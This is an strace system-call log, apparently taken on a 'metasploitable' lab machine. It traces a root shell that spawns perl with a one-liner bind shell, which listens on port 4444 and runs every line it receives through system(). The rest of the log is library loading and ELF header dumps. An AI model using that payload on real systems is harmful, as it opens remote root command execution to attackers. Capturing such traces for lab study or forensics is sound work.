5519  07:09:24.873760 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db5000

5519  07:09:24.873771 mmap2(0xb7dc9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7dc9000

5519  07:09:24.873786 mmap2(0xb7dcb000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dcb000

5519  07:09:24.873799 close(1)          = 0

5519  07:09:24.873824 munmap(0xb7f5b000, 29913) = 0

5519  07:09:24.873841 open("/etc/ld.so.cache", O_RDONLY) = 1

5519  07:09:24.873853 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5519  07:09:24.873869 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f5b000

5519  07:09:24.873879 close(1)          = 0

5519  07:09:24.873889 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5519  07:09:24.873903 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

5519  07:09:24.873917 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5519  07:09:24.874076 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

5519  07:09:24.874093 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dab000

5519  07:09:24.874105 mmap2(0xb7db3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7db3000

5519  07:09:24.874121 close(1)          = 0

5519  07:09:24.874133 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5519  07:09:24.874146 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

5519  07:09:24.874160 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5519  07:09:24.874251 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

5519  07:09:24.874268 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da0000

5519  07:09:24.874279 mmap2(0xb7da9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7da9000

5519  07:09:24.874294 close(1)          = 0

5519  07:09:24.874315 munmap(0xb7f5b000, 29913) = 0

5519  07:09:24.874330 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

5519  07:09:24.874344 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

5519  07:09:24.874356 _llseek(1, 0, [0], SEEK_CUR) = 0

5519  07:09:24.874367 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

5519  07:09:24.874383 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f62000

5519  07:09:24.874394 _llseek(1, 1624, [1624], SEEK_SET) = 0

5519  07:09:24.874408 munmap(0xb7f62000, 1624) = 0

5519  07:09:24.874418 close(1)          = 0

5519  07:09:24.874457 getpgrp()         = 3831

5519  07:09:24.874498 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

5519  07:09:24.874531 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

5519  07:09:24.874561 brk(0x8101000)    = 0x8101000

5519  07:09:24.874591 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5519  07:09:24.874606 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5519  07:09:24.874620 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5519  07:09:24.874655 brk(0x8102000)    = 0x8102000

5519  07:09:24.874681 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5519  07:09:24.874700 stat64("/sbin/AB", 0xbf8d7728) = -1 ENOENT (No such file or directory)

5519  07:09:24.874711 stat64("/bin/AB", 0xbf8d7728) = -1 ENOENT (No such file or directory)

5519  07:09:24.874722 stat64("/usr/sbin/AB", 0xbf8d7728) = -1 ENOENT (No such file or directory)

5519  07:09:24.874734 stat64("/usr/bin/AB", 0xbf8d7728) = -1 ENOENT (No such file or directory)

5519  07:09:24.874747 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5519  07:09:24.874761 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dd66f8) = 5520

5520  07:09:24.874804 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5520  07:09:24.874820 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5520  07:09:24.874832 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5520  07:09:24.874844 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5520  07:09:24.874859 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5520  07:09:24.874874 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5520  07:09:24.874887 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5520  07:09:24.874952 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

5520  07:09:24.874994 --- SIGPIPE (Broken pipe) @ 0 (0) ---

5520  07:09:24.875078 exit_group(127)   = ?

5519  07:09:24.880869 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5519  07:09:24.880870 --- SIGCHLD (Child exited) @ 0 (0) ---

5519  07:09:24.880870 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 5520

5519  07:09:24.880870 waitpid(-1, 0xbf8d73a8, WNOHANG) = -1 ECHILD (No child processes)

5519  07:09:24.880870 sigreturn()       = ? (mask now [])

5519  07:09:24.880870 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5519  07:09:24.880871 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5519  07:09:24.880871 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5519  07:09:24.880871 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

5519  07:09:24.880871 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5519  07:09:24.880871 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

5519  07:09:24.880872 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5519  07:09:24.880872 stat64("/sbin/perl", 0xbf8d7758) = -1 ENOENT (No such file or directory)

5519  07:09:24.880872 stat64("/bin/perl", 0xbf8d7758) = -1 ENOENT (No such file or directory)

5519  07:09:24.880872 stat64("/usr/sbin/perl", 0xbf8d7758) = -1 ENOENT (No such file or directory)

5519  07:09:24.880873 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5519  07:09:24.880887 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5519  07:09:24.880911 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5519  07:09:24.880925 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dd66f8) = 5521

5521  07:09:24.880979 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5521  07:09:24.881022 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5521  07:09:24.881035 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5521  07:09:24.881061 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5521  07:09:24.881075 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5521  07:09:24.881090 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5521  07:09:24.881102 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5521  07:09:24.881134 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

5521  07:09:24.881214 brk(0)            = 0x8153000

5521  07:09:24.881233 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5521  07:09:24.881248 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fcc000

5521  07:09:24.881263 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5521  07:09:24.881279 open("/etc/ld.so.cache", O_RDONLY) = 1

5521  07:09:24.881290 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5521  07:09:24.881307 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc4000

5521  07:09:24.881317 close(1)          = 0

5521  07:09:24.881327 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5521  07:09:24.881342 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5521  07:09:24.881355 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5521  07:09:24.881448 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5521  07:09:24.881477 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fc0000

5521  07:09:24.881517 mmap2(0xb7fc2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fc2000

5521  07:09:24.881564 close(1)          = 0

5521  07:09:24.881575 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5521  07:09:24.881588 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

5521  07:09:24.881602 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

5521  07:09:24.881687 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

5521  07:09:24.881704 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f9b000

5521  07:09:24.881715 mmap2(0xb7fbe000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fbe000

5521  07:09:24.881730 close(1)          = 0

5521  07:09:24.881742 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5521  07:09:24.881755 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

5521  07:09:24.881768 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

5521  07:09:24.881853 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

5521  07:09:24.881869 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9a000

5521  07:09:24.881881 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f82000

5521  07:09:24.881891 mmap2(0xb7f96000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f96000

5521  07:09:24.881905 mmap2(0xb7f98000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f98000

5521  07:09:24.881918 close(1)          = 0

5521  07:09:24.881929 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5521  07:09:24.881942 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5521  07:09:24.881970 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5521  07:09:24.882117 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5521  07:09:24.882135 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e33000

5521  07:09:24.882146 mmap2(0xb7f7c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f7c000

5521  07:09:24.882160 mmap2(0xb7f7f000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f7f000

5521  07:09:24.882174 close(1)          = 0

5521  07:09:24.882185 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5521  07:09:24.882198 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

5521  07:09:24.882211 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

5521  07:09:24.882298 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

5521  07:09:24.882314 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e01000

5521  07:09:24.882325 mmap2(0xb7e0a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e0a000

5521  07:09:24.882339 mmap2(0xb7e0c000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e0c000

5521  07:09:24.882351 close(1)          = 0

5521  07:09:24.882374 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e00000

5521  07:09:24.882386 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e008c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5521  07:09:24.882441 mprotect(0xb7f7c000, 4096, PROT_READ) = 0

5521  07:09:24.882504 munmap(0xb7fc4000, 29913) = 0

5521  07:09:24.882517 set_tid_address(0xb7e00908) = 5521

5521  07:09:24.882541 set_robust_list(0xb7e00910, 0xc) = 0

5521  07:09:24.882554 futex(0xbfcd3170, 0x81 /* FUTEX_??? */, 1) = 0

5521  07:09:24.882568 rt_sigaction(SIGRTMIN, {0xb7f862c0, [], SA_SIGINFO}, NULL, 8) = 0

5521  07:09:24.882581 rt_sigaction(SIGRT_1, {0xb7f86340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

5521  07:09:24.882593 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

5521  07:09:24.882606 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

5521  07:09:24.882624 uname({sys="Linux", node="metasploitable", ...}) = 0

5521  07:09:24.882669 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

5521  07:09:24.882715 brk(0)            = 0x8153000

5521  07:09:24.890518 brk(0x8174000)    = 0x8174000

5521  07:09:24.890565 getuid32()        = 0

5521  07:09:24.890575 geteuid32()       = 0

5521  07:09:24.890584 getgid32()        = 0

5521  07:09:24.890593 getegid32()       = 0

5521  07:09:24.890629 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ddf000

5521  07:09:24.890656 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

5521  07:09:24.890672 read(1, ">\226\255\215", 4) = 4

5521  07:09:24.890686 close(1)          = 0

5521  07:09:24.890703 time(NULL)        = 1495624164

5521  07:09:24.890745 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfcd2e40) = -1 ENOENT (No such file or directory)

5521  07:09:24.890762 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfcd2e40) = -1 ENOENT (No such file or directory)

5521  07:09:24.890775 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfcd2e40) = -1 ENOENT (No such file or directory)

